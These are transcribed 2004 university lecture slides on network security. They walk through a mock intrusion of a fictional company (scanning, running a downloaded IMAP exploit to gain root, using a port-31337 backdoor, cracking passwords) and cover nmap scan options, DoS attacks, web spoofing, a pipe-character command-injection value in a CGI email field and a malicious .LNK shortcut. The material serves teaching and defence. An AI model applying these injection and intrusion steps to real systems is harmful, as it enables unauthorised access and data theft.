sec_l16_2004student - Pacific Lutheran University

Download Report

Transcript sec_l16_2004student - Pacific Lutheran University

Introduction to Computer Security
Lecture 16
Dr. Richard Spillman
Pacific Lutheran University
Summer 2004
1
Last Lecture
• Computer Crime
• History
• The Internet Worm
• Introduction to Networks
• Introduction to Network Security
2
Review - Goals
• Network security must, at a minimum:
– Keep assets available - operational and
protected from vandalism and other
outages
– Protection of confidential property and
assets
– Maintain integrity of important
information
3
Outline
• Computer Crimes
• An Example Attack
• Network Intrusion Techniques
• Case Study: A Red Team Report
• Other Common Attacks
• Firewalls
4
CyberAttacks
• Perhaps even more concerning than the overall increase of new
vulnerabilities is the fact that this rise was driven almost
exclusively by vulnerabilities rated as either moderately or highly
severe.
– In 2002, moderate and high severity vulnerabilities increased by 84.7%,
while low severity vulnerabilities only rose by 24.0%.
5
Crimes 1
• Co-operators Life Insurance Company has warned more
than 180,000 customers across Canada about possible
identity theft after the disappearance of a computer hard
drive containing personal information.
•
In a letter to life insurance and pension plan clients, the
top official of the company's parent firm says the loss of the
hard drive in Regina is extremely serious and "theft of an
individual's identity is possible in such circumstances.”
– "Vital information such as name, address, date of birth, social
insurance number and mother's maiden name can be used to
access financial accounts, open new bank accounts, transfer bank
balances, apply for loans, credit cards and other financial services,"
6
Crimes 2
• DALnet suffered from a debilitating distributed denial-ofservice (DDoS) attack beginning in Janurary 2003--over
a month in duration--that may force it offline.
• According to a DALnet statement, the attack against its
DNS systems, and Web, IRC and e-mail servers is
causing "great inconvenience and financial loss" for
many organizations that host its services.
– Some have suspended or discontinued their support of DALnet,
which is staffed by volunteers and run with donated equipment
and
bandwidth.
– DALnet says it's working with law enforcement to locate and
prosecute its attackers.
7
Crimes 3
• The accounts of millions of AOL subscribers
were jeopardized in January 2003 due to a
serious flaw in the company's Web-based mail
system
– The vulnerability stems from an error in one of AOL's
international e-mail authentication systems, which
granted users access without correctly verifying
passwords.
– By simply entering an account name, an AOL user
had the ability to read any other user's e-mail and all
personal data contained therein.
– Private correspondence suddenly became open for
public perusal, and sensitive information such as
passwords and account numbers were potentially
exposed to prying eyes.
8
The Goal
• Your goal is to
attack the Web
site for
Bigwidget
9
Gather Information
• Find basic
information about
their website
– Go to
http://www.internic.net/
– type in the company
name
10
Result
BIGWIDGET.COM
Registrant:
BigWidget, Conglomerated. (BWC2-DOM)
1234 Main Street
Anytown, GA USA
Domain Name: bigwidget.com
Administrative Contact, Technical Contact, Zone Contact:
BigWidget Admin (IA338-ORG) [email protected]
Phone- 678-555-1212
Fax- 678-555-1211
Billing Contact:
BigWidget Billing (IB158-ORG) [email protected]
Phone- 678-555-1212
Fax- 678-555-1211
Record last updated on 29-Jun-98.
Record created on 30-Jun-94.
Database last updated on 13-Oct-98 06:21:01
EDT.
Domain servers in listed order:
EHECATL. BIGWIDGET
208.21.0.7
NS1.SPRINTLINK.NET
204.117.214.10
NS.COMMANDCORP.COM 130.205.70.10
11
Try to Connect . . .
hacker: ~$ telnet bigwidget.com 25
Try to access port 25 usually the sendmail port
Trying 10.0.0.28...
Connected to bigwidget.com
Appears to work
Escape character is '^]'.
Connection closed by foreign host.
Suddenly disconnected
probably by a firewall
Continue to try other ports . . .
12
Success
hacker:~$ telnet bigwidget.com 143
Try to access port 143
Trying 10.0.0.28...
Connected to bigwidget.com.
* OK bigwidget IMAP4rev1 Service 9.0(157)
at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)
(Report problems in this server
to [email protected])
It is successful - it is
an IMAP port so it is
most likely a LINIX
server with an hole in
its firewall
. logout
* BYE bigwidget IMAP4rev1 server terminating
connection
. OK LOGOUT completed
Logoff and try to find
a way to break into an
IMAP port
Connection closed by foreign host.
13
More Information
• Go to a
web site
called
RootShell
14
IMAP Weakness
• Search
on IMAP
There are
several available
Select
15
Download the Program
16
Run the Attack
hacker ~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius ([email protected])
Modifications: p1 ([email protected])
Completed successfully.
Compile the program
Run it against the
BigWidget server
hacker ~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
login: root
bigwidget:~# whoami
What has happened?
root
17
Result
• You are through the firewall and on the server as
root.
– There are no more defenses
• The program you used against BigWidget made
the Linux server allow you to log on as root
WITHOUT having to use a password!
– This is a real hole and there are thousands more like
them available on hacker sites across the web. Not
just for Linux but for every conceivable operating
system running today.
18
Attack the System
Now try find which
machines on the network
will trust you
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1
208.21.2.10
208.21.2.11
208.21.2.12
208.21.2.13
208.21.2.14
208.21.2.15
localhost
thevault
fasttalk
geekspeak
people
thelinks
thesource
localhost.localdomain
accounting
sales
engineering
human resources
marketing
information systems
19
Accounting
# exit
Connection closed by foreign host.
Logon to the accounting
machine
hacker:/export/home/hacker>
telnet www.bidwidget.com 31337
Trying 208.21.0.35...
Escape character is '^]'.
Granting rootshell...
# hostname
www
# whoami
root
# rlogin thevault
20
Search the Directories
You find a creditcards
directory with a file called
visa.txt
thevault:~# cd /data/creditcards
thevault:~# cat visa.txt
Allan B. Smith
Donna D. Smith
Jim Smith
Joseph L.Smith
Kay L. Smith
Mary Ann Smith
Robert F. Smith
6543-2223-1209-4002
6543-4133-0632-4572
6543-2344-1523-5522
6543-2356-1882-7532
6543-2398-1972-4532
6543-8933-1332-4222
6543-0133-5232-3332
thevault:~# crack /etc/passwd
12/99
06/98
01/01
04/02
06/03
05/01
05/99
Read it
Use a password program
to discover some system
passwords
Cracking /etc/passwd...
username: bobman
username: mary
username: root
password: nambob
password: mary
password: ncc1701
21
General Attack Styles
• There are two attack styles: Equal Opportunity and Specific
Target
• Equal Opportunity
• Looks for ANY host that is vulnerable to an exploit(s) that the hacker
knows.
• Probably has nothing against the site being attacked (except contempt
for their security).
• Looking to steal resources and/or launch other attacks from the
exploited hosts.
• Will only spend a short amount of time looking at your network
• Specific Target
• Targets a specific organization
• May be motivated by profit, revenge, or ideology
22
• Spends a much larger amount of time collecting information about the
network under attack.
Gather Information
• The hacker will want to determine the structure
of the network including
– What hosts exist on the network
– What are the routes for the network
– Where any firewalls are located
• Some, if not all, of the hosts for a network will be
listed in the domain records.
• To find the remaining hosts requires scanning.
• Using nmap (as in the last lecture)
23
Network Paths
• It is useful for the hacker to know the
structure of the network.
– Allows hacker to know the path packets will take
through the network
– May suggest machines to take over, that will allow
firewalls to be bypassed
• Routes can be determined by
– Asking the routers
– Tracing packets into the network
• traceroute (tracert.exe under NT) performs this function
24
Ask the Routers
• Simple Network Management Protocol (SNMP)
– Many sites have SNMP enabled routers but do not restrict who can
retrieve information from them.
– Can be used to determine routing tables
• snmpnetstat is part of a collection of free snmp
client programs put out by Carnegie Mellon
University
• snmpnetstat <host> public -rn
snmpnetstat challenger public -rn
Routing tables
Destination
Gateway
Flags
Interface
default
fw1
UG
if0
156.80.189.49/32
lager
UG
if0
192.168.1
challenger.info-as U
Ethernet0
192.168.4
crash.info-assuran UG
if0
208.208.101.32/27
challenger.info-as U
Ethernet1
208.208.101.64/27
challenger
Ethernet2
U
25
Packet Paths
• Traceroute can be used to see what
path a packet takes to reach its
destination
traceroute 198.6.1.1
Tracing route to cache00.ns.uu.net [198.6.1.1]
over a maximum of 30 hops:
1
<10 ms
<10 ms
<10 ms challenger.info-assurance.com [208.208.101.33]
2
<10 ms
*
<10 ms fw1.info-assurance.com [192.168.1.2]
3
<10 ms
10 ms
<10 ms iacgw.info-assurance.com [208.208.101.18]
4
10 ms
<10 ms
10 ms corpgw.info-assurance.com [192.168.2.1]
5
10 ms
10 ms
20 ms Fddi2-0.GW2.DCA1.ALTER.NET [137.39.62.33]
6
10 ms
10 ms
20 ms 105.ATM3-0.XR1.DCA1.ALTER.NET [146.188.161.42]
7
10 ms
10 ms
10 ms 195.ATM1-0-0.GW1.FFX2.ALTER.NET [146.188.160.161]
8
10 ms
10 ms
20 ms 271.atm6.wodc7-esr1.ops.us.uu.net [207.18.172.66]
9
10 ms
10 ms
20 ms cache00.ns.uu.net [198.6.1.1]
Trace complete.
26
Port Scanning
• Used to
determine what
services might
be running on a
target that are
visible through
the firewall.
• One of the best
is Nmap from
www.insecure.or
g.
•
•
•
Supports many
techniques for
detecting open
ports
Has stealth
features to make
it harder to
detect
Can frequently
guess the
operating
system
nmap -O hacker
Starting nmap V. 2.3 by Fyodor ([email protected],
www.insecure.org/nmap/)
Interesting ports on hacker (208.208.101.58):
Port
State
Protocol
Service
21
open
tcp
ftp
23
open
tcp
telnet
25
open
tcp
smtp
37
open
tcp
time
79
open
tcp
finger
111
open
tcp
sunrpc
512
open
tcp
exec
513
open
tcp
login
514
open
tcp
shell
2049
open
tcp
nfs
TCP Sequence Prediction: Class=random positive increments
Difficulty=12505 (Worthy challenge)
Remote operating system guess: Solaris 2.6 - 2.7
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
27
OS Information
• Knowing the target OS enables the attacker to
find specific exploit information and scripts.
• To determine the operating system the hacker
can:
• Inspect the banners of services such as telnet, ftp,
and smtp. These frequently reveal the name and
version of the operation system.
• Use TCP/IP fingerprinting. This is a technique of
determining an operating system by querying the
targets TCP/IP stack.
• nmap supports very sophisticated TCP/IP fingerprinting
28
Common
Vulnerabilities
• Services that allow information to
be read from, or written to, the
target’s storage are great places
to start an attack.
– File transfer protocol (ftp)
– Network File Service (NFS)
– System Message Block (SMB) -Windows 95/98/NT
29
Exploit
Vulnerabilities
• rpcinfo -p <host> and showmount -e <host>
Can be used to determine if any part of a UNIX file system
is shared.
• smbclient -L <netbios name> -I <target IP> - Can be used
to determine SMB file shares. (from the Unix Samba
utility)
• User account information can be gained in a variety of
ways.
– On Unix, the finger service (if it is running)
• finger user@host
– On Windows, through SMB
• smbclient -L host_name -I ip_address
– Social Engineering
30
Find New
Vulnerabilities
• Each service that has been identified is a potential
way of exploiting the system.
• There are many sources of information on the
Internet that distribute information about
vulnerabilities for different services.
• Most only list vulnerability information along with
how to fix or protect against the vulnerability
• Some list exploitation information as well.
31
Summary
• Hackers need information to be able to break
into a network.
• There are many different ways they collect
this information.
• Denying hackers information about your
network will deny them access to your
network
32
Network Scanners
• Scanners are intended to simplify and
accelerate the process of finding
vulnerabilities and potential exploits on
a network or host.
• There are two major types of scanners:
– Port scanners
– Vulnerability scanners
33
Port Scanners
• Determine what ports are listening on a host.
• Many are freely available on the web
• Available for a wide variety of operating systems
• One of the most sophisticated scanners
available is nmap
34
nmap
• Available at www.insecure.org
• Runs on most versions of Unix
– Some features not available on some versions of Unix
– All features work under Linux.
• Supports
– Scanning for hosts
– Port scanning
– Operating system detection
35
nmap Scan
Techniques 1
• nmap has many ways to conduct host and
port scans.
• These include
– TCP (-sT) - Very basic TCP connect scan. Scans often
leave error or connect messages in target’s logs.
– SYN (-sS) - Similar to -sT, but does not complete the
TCP three-way handshake. Less likely to be logged by
the target.
– FIN (-sF) - Uses packets with the FIN flag set. May be
more stealthy that SYN scanning.
– Xmas (-sX) - Turns on several flags (FIN, URG, PUSH)36
in packets.
nmap Scan
Techniques 2
• Types of scans (cont’d)
– Null (-sN) - Sends empty packets (no TCP flags set) to the
target. Ineffective against Windows systems.
– Ping (-sP) - Only determines if a target host is up. Uses TCPbased methods in addition to ICMP.
– UDP (-sU) - Sends null-byte UDP packets to determine open
UDP ports.
– RPC (-sR) - Works in combination with other scans to identify
SunRPC services.
37
nmap Options 1
• Defining the target port
– The default is to scan 1 through 1024 plus any services listed in
/etc/services
– Set port range (-p <port range>)
• Sets the ports that Nmap will scan
– Fast scan mode (-F)
• Scans all ports listed in Nmap’s included services file
• Defining the source port (-g <port #>)
– Useful for bypassing some firewall filters.
• Operating System identification (-O)
– Uses TCP/IP fingerprinting technique to very accurately guess the
Operating System of the host being scanned.
38
nmap Options 2
• Spoofing the source address (-D <list
of decoys>)
– Sends spoofed packets from each decoy to
attempt to hide the real source of the scan.
• Fragmenting the attack (-f)
– Increases the potential stealth and success of
a scan
– Works in combination with SYN, FIN, Xmas,
39
Null scan types
Network Vulnerability Scanners
• In addition to identifying open ports, network
vulnerability scanners have the ability to test
these open ports for known vulnerabilities.
• Their ability to detect a vulnerability is limited by
their vulnerability database.
• There are two main types
– General
– Specific
40
General NVS
• Have large databases of vulnerabilities
• Can be used by a hacker to learn a broad range
of vulnerabilities for the network under attack
• Detected easily by Intrusion Detection Systems
and/or log reviews.
• Used more frequently by system administrators to
identify weakness in their own network.
41
General Scanners
• Free Network Vulnerability
scanners
– Security Administrator's Integrated Network
Tool (SAINT)
• An updated version of the notorious SATAN tool.
– The CIAC produce a tool called Courtney that
attempts to detect SAINT/SATAN scans.
– Nessus by Renaud Deraison
• Open source vulnerability scanner
• First released April 1999
42
Specific NVS
• Usually target just one specific
vulnerability
• Used to search through a large number of
hosts to identify those that might be
susceptible to an exploit known by the
hacker
• Much less use to network administrators
as they only focus on one narrow area of
vulnerability.
43
Specific Profile
Inspector (SPI)
• Distributed host scanner
– hosts are scanned by modules that report their results
to a management console
• Product of the Computer Security Technology
Center at the Lawrence Livermore National
Laboratory
– http://ciac.llnl.gov/cstc/spi/spiwnt/spiv20.html
• Latest version is 2.01
• Freely available to all U.S. Government agencies44
Penetration
Experiment
• The following slides outline an actual break in that
was conducted by a Red Team
– A Red Team is formed to perform a break in on an
generally unsuspecting client system
• All identification of the team and the client has
been removed and only a few of the details of the
experiment are reported
– The results illustrate how easy it is in “real” life to break
into a computer system even when it has some
45
defenses in place
Scanning the Network
• Dig was used to research the domain
records for the organization.
• A search engine found at www.htdig.org
• nmap was run against the networks
that were found.
– A database of open ports for these hosts was
created
46
Network Structure
• From the nmap
data we were able
to deduce the
structure of one of
the networks
including the
filtering rules and
type of firewall.
Internet
Firewall
Workstation
ServerA
Workstation
Firewalls Rulebase
Source IP
Private Net
Any
Any
Source Port
Any
Any
Any
Destination IP
Any
ServerA
Any
Destination Port Proto
Any
TCP
80
TCP
Any
Any
Flags
Any
Any
Any
Action
Allow
Allow
Reject
Description
____
Allow all outbound traffic
Allow http requests to ServerA
Disallow all other traffic
47
Information
Gathering
• The only service that was available for attack
was http on port 80 to serverA.
• We used a telnet client to manually request a
page from the web server.
• By inspecting the http header from the request
we were able to determine that they were
running Windows NT server with Internet
Information Server version 4.0.
48
Known Vulnerability
• Microsoft web servers frequently have the
Microsoft FrontPage Extensions installed.
• By attempting to connect to ServerA using
the Microsoft FrontPage client, we were
able to determine that the server was
running the FrontPage extensions. Further,
the front page admin password was NOT
49
set.
Microsoft Frontpage
• With admin rights to their FrontPage web
site comes the ability to read and write
files to the web servers hard disk.
– This is limited to the section of the disk where
the web site is located.
• The IIS web server was also configured to
execute programs at the request of a
browser.
– This capability is common and is the way
many sites provide dynamic content.
50
Gaining Control
• We transferred a program to one of the web server’s
directories, then asked the web server to execute the
program for us.
• Our program was executed by the web server and
therefore had the same system privileges as the web
server.
• Using the console we we were able to capture the system
registry file (which contains the NT user account
information).
• L0phtcrack was run against this file and was able to break
51
the Administrator’s password.
Result
• With the Administrator’s password we
were able to take full control of ServerA
• Using Server A as a launching point we
were able to circumvent the firewall,
allowing us to attack all of the hosts on the
network
52
Case Summary
• It does not take much access into a
network for it to be vulnerable to attack.
• Servers that offer publicly accessible
services are vulnerable to attack.
• If public and private systems are located
on the same network segment, a
penetration of the public system allows
53
Denial of Service
• Attacks don’t break in, but they deny you
access to your own resources.
• Several recent incidents reported; more
are likely.
• Defending against such attacks is very
hard. If it’s cheaper for the attacker to
send a message than for you to process it,
you lose.
54
SMURF Attack
• Attacker sends “ping” to intermediate network’s
broadcast address.
• Forged return address is target machine.
• All machines on intermediate network receive
the “ping”, and reply, clogging their outgoing net
and the target’s incoming net.
• Firewalls at target don’t help -- the line is
clogged before it reaches there.
55
Other DoS Attacks
• Teardrop
– Send overlapping IP fragments.
– Destination machine doesn’t handle the overlap
properly, and crashes.
• Ping of Death
– Send very large IP packet, fragmented into many
smaller ones.
– Length wraps around, crashing target.
• Both can get through some firewalls.
56
LAND Attack
• Send TCP packet where the source and
destination addresses are that of the
target machine, and the port numbers
match.
• Target sees this as an attempt to connect
a socket to itself, and gets terminally
confused.
• Can be blocked by anti-spoofing filter.
57
DNS Attack
• Attacker sets up Domain Name Server
• When an applet asks the DNS to resolve
a host address the DNS lies about the IP
address
• Netscape 2.01 and JDK 1.01 fixed this by
determining if a connection is allowed
based on the IP address
58
Web Spoofing
• Attacker modifies web server
– A page in the attacker’s server has all hyperlinks set to
the attacker server
• When the user navigates through one of these
hyperlinks:
–
–
–
–
server receives the request
downloads the page
alters the hyperlinks
rewrites page before passing it to the user
59
Attack Diagram
60
How Spoofing Works
• The key to this attack is for the
attacker’s Web server to sit between
the victim and the rest of the Web.
• This kind of arrangement is called a
“man in the middle attack”
• The first step is called ULR
Rewriting
61
URL Rewriting
• The attacker’s first trick is to rewrite all of the
URLs on some Web page so that they point to
the attacker’s server rather than to some real
server.
– Assuming the attacker’s server is on the machine
www.attacker.org, the attacker rewrites a URL by
adding http://www.attacker.org to the front of the URL.
– For example, http://home.netscape.com becomes
http://www.attacker.org/http://home.netscape.com.
– when the victim requests a page through one of the
rewritten URLs. The victim’s browser requests the
page from www.attacker.org, since the URL starts
with http://www.attacker.org. The remainder of the
URL tells the attacker’s server where on the Web to 62
go to get the real document.
False Web
• Once the attacker’s server has fetched the real
document needed to satisfy the request:
– the attacker rewrites all of the URLs in the document
into the same special form by splicing
http://www.attacker.org/ onto the front.
– Then the attacker’s server provides the rewritten page
to the victim’s browser.
– Since all of the URLs in the rewritten page now point
to www.attacker.org, if the victim follows a link on the
new page, the page will again be fetched through the
attacker’s server. The victim remains trapped in the
attacker’s false Web, and can follow links forever
63
without leaving it.
False Web Forms
• If the victim fills out a form on a page in a
false Web, the result appears to be
handled properly.
– Spoofing of forms works naturally because forms are
integrated closely into the basic Web protocols: form
submissions are encoded in Web requests and the
replies are ordinary HTML.
– When the victim submits a form, the submitted data
goes to the attacker’s server. The attacker’s server
can observe and even modify the submitted data,
doing whatever malicious editing desired, before
passing it on to the real server.
– The attacker’s server can also modify the data
64
returned in response to the form submission.
Secure Connections
• Secure connections do not help
• If the victim does a “secure” Web access in
a false Web, everything will appear
normal:
– the page will be delivered, and the secure connection
indicator (usually an image of a lock or key) will be
turned on.
– The victim’s browser says it has a secure connection
because it does have one. Unfortunately the secure
connection is to www.attacker.org and not to the place
65
the victim thinks it is.
Spoofing Clues
• There are some clues that could indicate
that you are the victim of a spoofing attack
– Status line indicator: when the mouse is held
over a link or during the transfer to a link, the
status line will show the target site
– Location line: the location line displays the
current URL
• If you monitor these lines you should notice
the strange URL
66
Problem
• The attacker can cover up both of these cues by
adding a JavaScript program to every rewritten
page.
– Since JavaScript programs can write to the status
line, the attacker can arrange things so that the status
line always shows the victim what would have been
on the status line in the real Web.
– A JavaScript program can hide the real location line
and replace it by a fake location line that looks right
and is in the expected place. The fake location line
can show the URL the victim expects to see.
67
CGI Programs
• A CGI program allows
– process data of submitted web form
– executable : major source of security holes
• two dangers :
– leaking of information : can lead to intrusion
– remote user tricks script into execution of
system commands
68
Information Leakage
• A CGI program can gather information from a
web server without the users knowledge
• Go to
http://hoohoo.ncsa.uiuc.edu/cgi/examples.html.
– trigger the cgi script from their browser. The server
will return the information the server is able to obtain
from the client.
69
Crashing a Web Server
• A malicious user can crash a Web
server computer by running a CGI
script that runs the following simple C
program:
– for (;;) malloc(1024);
– the program will use up all available RAM of
the Web server in seconds
– the Web server computer is completely
nonfunctional
70
Result
• The Web Server is still able to respond to
pings.
– This means that common administrative programs
which ping network servers peri-odically to ensure that
servers are up and running will not notice anything
wrong.
– However, the computer will not be able to allocate
memory to create any new process. Hence, all
connection requests will be refused.
– Any connections that were already established will
lock.
71
Incomplete Input
Checking
• Example: Guestserver is a guestbook system that enables you to have
your own guestbook on your homepage, without having all the scripts
and data located on a completely different server.
• The Bug: uestbook.cgi is vulnerable to a remote command execution
bug. This bug is caused by an incomplete filter of the email variable.
– The email variable is first filtered for HTML tags then commas, semi-colons,
and colons.
– But the | (pipe) character is not filtered!
– So we can construct an email variable with commands delimited by |'s and
the cgi will happily execute these commands if it looks like a "normal" email
address.
• An example email variable that would execute "bleh" on remote server "|
bleh | [email protected]".
– This would result in the execution of:
"/bin/sh -c <mail program>|bleh|[email protected]"
72
Race Condition Bug
• A common security vulnerability is generated by careless
system level shell programs that generate temporary files
with improper protection.
• These files if caught in time by the attacker can be
overwritten and possibly open up security risks
• If the attacker can guess what the file name is, he can
write a simple program that continuously check for the file
and act as soon as the file existence was detected.
• Example: updatedb crontab-script generates a
/tmp/locatedb.XXXX file that is world writeable. The file is
later moved without checking to /var/lib/locatedb
73
Hole in IE
• Discovered by Paul Greene
• Microsoft posted a 400k patch within 48
hrs
– What does that mean?
• Effects of attack are devastating
– We are VERY lucky that the “good guys” found this
one first!!!!
74
Background
• Win95 and NT shortcuts
– basically symbolic links
– stored in .lnk or .url files depending on where
they point
– contain relative or absolute paths to
executables
• When a user clicks on (executes) a
shortcut, the program it points to runs
75
The Attack
• When a shortcut appears in a
URL
– shortcuts are treated the same as local
ones
– Sample HTML segment on a page:
• <A HREF=“Attack.LNK”> Click here for a
reward. </A>
– When a user clicks
• Attack.LNK is downloaded to the machine
• the thing pointed to by Attack.LNK is
executed!!!!!
76
Result
• Using WIN95, Attack.LNK points to:
– c:\bin\mkdir c:\HAHAHA
– c:\bin\rmdir -p c:\windows
• Basic attack allows bad guy to
– download a pointer to any program on the machine
– include any arguments to the program
– execute it when you visit the page
• THIS IS VERY SERIOUS!!!!!!!!!!
77
Microsoft’s Fix
• Display a pop-up window
– “Save to disk or open?”
– Save - postpone danger
– Open - it will execute
1. Do users read pop-up windows?
2. Do users pay attention to pop-up windows?
3. Do users just click OK so they can continue?
78
Firewall
• A firewall is a hardware/software combination that restricts
access to or from a network resource
• A network resource is any addressable entity on a
computer network
• Firewalls may be a router with filters, a bridge with filters
and may also be a dedicated firewall system
• If the Internet is involved, a firewall is not an option - it is
an absolute necessity for survival
• There are different types for different reasons
79
What is Protected?
• Your data
– Secrecy - what others should not know
– Integrity - what others should not change
– Availability - your ability to use your own systems
• Your resources
– Your systems and their computational capabilities
• Your reputation
–
–
–
–
–
Confidence is shaken in your organization
Your site can be used as a launching point for crime
You may be used as a distribution site for unwanted data
You may be used by impostors to cause serious problems
You may be viewed as “untrusted” by customers and peers
80
What can firewalls do?
•
•
•
•
•
•
Focus for security decisions
Enforce security policies
Log network access efficiently
Limits your exposure
Provides traceback for intrusions
Allows accurate accounting of
activities
81
What firewalls can’t do . . .
• No protection from malicious insiders
• No protection from connections that do
not go through the firewall facilities
• No protection from completely new threats
• Can’t protect against viruses without
either a bastion host server with scanning
software or session packet reconstruction
and scanning
• Can’t protect against what looks like a
legitimate session from the “untrusted”
82
side
Major Firewall Limitations
• Firewalls can only enforce security on packets
that they get to process.
– A packet must pass through the firewall before a
security decision can be made.
– All paths to and from the trusted network must pass
through the firewall before reaching the untrusted
network
.
• Firewalls have a difficult time distinguishing
between valid requests and malicious requests
at the application layer.
– Ex: Exploits exist for certain web servers that look like
83
normal, well formed, http requests.
Firewalls become
Targets
• If a hacker can take over your firewall,
they can attack your network at will.
• It is essential that the Firewall itself is
immune to penetration
– No unnecessary processes should be running
on the firewall
– The rule base should include rules to protect
the firewall.
84
Router vs. Firewall
• Many vendors have routers with filters in them
and claim to be a “firewall”
• True firewalls not only filter to a very fine
resolution, but also provide extensive tracking
and reporting; this means disk storage, file
management and printing are part of the system
• True firewalls offload filtering and scanning duties
from a router so that the router may do what it
was designed to do: route efficiently and quickly
85
Firewall Types
• Frame filtering
– Filters at layer 2 for specific types of security
• Packet filtering
– Filters to the bit level in every packet it sees
• Application filtering
– Also knows specific detail about application functions and can
filter application items
• Application proxy filtering
– Also can scan for specific application-specific conditions and
session data (user information)
• “Stateful” Inspection
– Does packet, application and some minimal proxy-like functions
86
Packet Filtering
Screening Router
Internal Network
Filter Rules
External Network
192.168.4.0/24
Other Hosts
Source IP
192.168.4.0/24
Any
Any
Any
Any
Mail Server
Web Server
192.168.4.5
192.168.4.6
Source Port
Any
Any
Any
Any
Any
Destination IP
Any
Any
192.168.4.5
192.168.4.6
Any
Destination Port Proto
Any
TCP
> 1024
TCP
25
TCP
80
TCP
Any
Any
Flags
Any
ACK
Any
Any
Any
Action
Allow
Allow
Allow
Allow
Reject
Description
____
Allow all of our traffic out
Allow replies to our calls
Allow traffic to our mail server
Allow traffic to our web server
Disallow all other traffic
87
Packet Filtering
Issues
• Basic capability of most routers
• Rules are applied in order
• Limitations
– Decision is based on current packet only (no
context)
– Packet header is usually the only source of
information.
– Cannot block a large subset of illegitimate packets.
88
Proxy Filter
• Makes it appear that the host and user are
directly connected but in reality everything is
sent through a proxy server
Client
Real Server
Perceived Connection
User
External Host
Proxy Server
89
Proxy Operation
• Able to make decisions based on
application layer information inside the
packet.
• Supports robust, application aware
logging.
• Understands context of communication
for the protocols supported.
– Ex: Can allow ftp-data connections through to ftp
client without allowing all high port traffic through.
90
Summary
• Computer Crimes
• An Example Attack
• Network Intrusion Techniques
• Case Study: A Red Team Report
• Other Common Attacks
• Firewalls
91